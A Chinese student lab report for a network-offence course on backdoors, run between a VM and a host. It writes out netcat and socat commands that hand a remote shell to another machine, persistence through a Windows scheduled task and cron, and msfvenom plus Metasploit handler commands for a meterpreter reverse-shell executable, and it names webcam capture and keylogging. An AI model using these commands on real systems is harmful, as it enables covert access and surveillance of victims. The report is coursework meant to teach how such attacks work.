2018-2019-2 网络对抗技术 20162329 Exp2 后门原理与实践
1.实践基础
1.1.什么是后门
- 后门就是系统或者软件在不经过正常认证流程就可以连接或使用的通道。
- 后门的产生有以下原因:
1.系统或软件在编写最初时程序员人为留下的特殊通道
2.系统或软件在编写时由于程序本身的原因产生的漏洞而被不法分子利用产生的后门
3.不法分子利用自制木马或其他攻击程序植入正常用户的主机产生的后门
1.2.基础问题
- 例举你能想到的一个后门进入到你系统中的可能方式?
随意点击网页链接浏览未知内容的网页
随意在网上下载未经认证的软件
使用游戏外挂
- 例举你知道的后门如何启动起来(win及linux)的方式?
Windows中启动应用程序时被启动
Linux中后台输入命令启动
- Meterpreter有哪些给你映像深刻的功能?
可以在一个正常的可执行文件中添加反弹链接的代码,使得它成为一个后门
通过该软件可以调取被入侵主机的摄像头和音频输入设备,实现实时拍照,摄像和录音的功能,还能监听被入侵主机的键盘输入,获取其当前输入的内容,这就让我们想到盗取用户密码等...可怕的事情
- 如何发现自己有系统有没有被安装后门?
1.通过杀毒软件的防护和扫描功能
2.不定时的检查电脑当前运行中的各种程序,发现异常进程因立即关闭
2.实践内容
2.1.使用netcat获取主机操作Shell,cron启动
kali
中是自带netcat
软件的所以我们不需要下载就可以正常使用。而Windows系统中是没有该程序的,需要先下载才可以进行我们的实验。
可以在老师的码云附件中下载(下载链接),无需安装解压即可使用。
注:由于控制需要通过网络,所以要首先保证攻击方主机和被攻击者主机网络是可连通的,由于实验是用虚拟机与物理机相互攻击,且两者使用同一网络,所以不存在该问题。
获取IP地址,Windows系统输入
ipconfig
,Linux系统输入ifconfig
在Linux系统中打开命令行,输入
nc -l -p 2329
在Windows系统中进入netcat程序所在文件夹,打开命令行输入
ncat 172.16.2.34 2329 -e cmd.exe
注:netcat中参数
-l 代表开启监听
-p 指定端口
-e 发送一个指定应用程序
- 两个系统可以互相实现调用shell的操作,不过Linux发送的是
-e /bin/sh
而不是cmd.exe
2.2.使用socat获取主机操作Shell, 任务计划启动
socat
拥有的功能与netcat
并没有什么区别,这部分主要是使用Windows的任务计划的功能让其在某个特定时段自动开启连接首先进入
控制面板-->搜索“管理工具”-->任务计划 并进入
- 点击创建任务
- 在触发器选项卡中设置在每天用户登录时启动
- 在操作中加入
socat.exe
在可选参数中填入
tcp-listen:2329 exec:cmd.exe,pty,stderr
使用快捷键
Win+L
快速注销用户再重新登录,可以发现程序已经启动了
然后在
kali
中输入
socat - tcp:172.16.2.65 2329
就可以连接到任务Windows
主机了
同样也可以在Linux
上设置计划任务,用Windows
去连接,Linux
命令格式如下:
* * * * * socat tcp-listen:[PORT] exec:/bin/sh,pty,stderr
//分 时 日 月 年 命令 参数:端口号 发送程序,类型
2.3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- 输入命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.2.34 `PORT=2329 -f exe > 20162329_backdoor.exe
-p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.
-x 使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。
-e 使用的编码器,用于对shellcode变形,为了免杀。
-i 编码器的迭代次数。如上即使用该编码器编码5次。
-b badchar是payload中需要去除的字符。
LHOST 是反弹回连的IP
LPORT 是回连的端口
-f 生成文件的类型
> 输出到哪个文件
- 使用
ncat
命令实现文件的传输
可以看到我们做好的后门已经传输到了Windows
系统上,然后运行我们这个程序结果什么事情都没有发生,但其实后门已经打开了,接下来就是实现后门的连接和做一些 骚操作
- 首先要在
Linux
系统上打开对后门程序的连接监听 - 输入
msfconsole
进入MSF控制台,如图还给我们画出了一个小忍者(黑客): - 依次输入下列命令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.2.34
set LPORT 2329
exploit
- 结果就连接成功了,如下图:
2.4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
那我们能做点什么呢?
help
一下
发现我们有好多事情可以做,比如调用对方的摄像头,拍个照
提个权吧
3.总结与体会
通过本次实验切实的了解了什么是后门,并且通过一系列操作在一定条件下我们也自己实现了后门的制作和渗透入侵,这也让我意识到了网络安全的重要性,然后想了想以前自己在网上随便下载软件和打开网页,真是让我感到细思极恐。实验既有趣又有用,我觉得以后我一定会更注意网络安全防护!!
2018-2019-2 网络对抗技术 20162329 Exp2 后门原理与实践的更多相关文章
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
- 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...
- 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...
随机推荐
- 开源顶级持久层框架——mybatis(ibatis)——day02
mybatis第二天 高级映射 查询缓存 和spring整合 课程复习: mybatis是什么? mybatis是一个持久层框架,mybatis ...
- LNMP组合环境
Mysql----二进制安装: 下载rpm包 创建MySQL用户: useradd -s /sbin/nologin mysql -M 这里遇到无法创建用户,提示:useradd: group mys ...
- Swift 4.0.2 按下tab bar item时, item会有内缩的animation效果(如同Twitter的tab bar 效果一样)
先上效果图: 假设 tab bar items 有5个.tag为0,1,2,3,4.storyboard中tab bar controller继承的class叫做xxxVC. class xxxVC: ...
- 第十四节,OpenCV学习(三)图像的阈值分割
图像的阈值处理 图像的阈值分割:图像的二值化(Binarization) 阈值分割法的特点是:适用于目标与背景灰度有较强对比的情况,重要的是背景或物体的灰度比较单一,而且总可以得到封闭且连通区域的边界 ...
- 论文翻译:Neural Networks With Few Multiplications
目录 Abstract 1. Introduction 2.Related Work 3.Binary And Ternary Connect 3.1 BINARY CONNECT REVISITED ...
- LeetCode第二十一题-对两个有序链表排序
Merge Two Sorted Lists 问题简介:合并两个已排序的链表并将其作为新链表返回 举例: 输入: 1->3->5, 1->2->4 输出: 1->1-&g ...
- 区块链之智能合约 solidity踩坑 --上篇
概述 最近在写合约时遇到一些坑,做一下总结: 介绍主要分一下三个方面: 对区块链的简单描述 结合业务场景,编写简单智能合约,时遇到的坑(上篇) assembly 的使用说明(下篇) 正文 进入正题之前 ...
- 使用git把本地目录传到远程仓库
需求: 要把本地不为空的一个目录和远程现有的一个仓库关联 步骤如下: git init //生成.git目录 git add . //把当前目录里的文件加入到暂存区 git commit -m '上传 ...
- 题解-Codeforces917D Stranger Trees
Problem \(\mathrm{Codeforces~917D}\) 题意概要:一棵 \(n\) 个节点的无向树.问在 \(n\) 个点的完全图中,有多少生成树与原树恰有 \(k\) 条边相同,对 ...
- Asp.Net Core配置Swagger
本文主要参考:Using Swagger with ASP.net Core 1.创建WebApi项目 本文使用ASP.Net Core Web API项目模板演示Swagger到使用,首先创建Web ...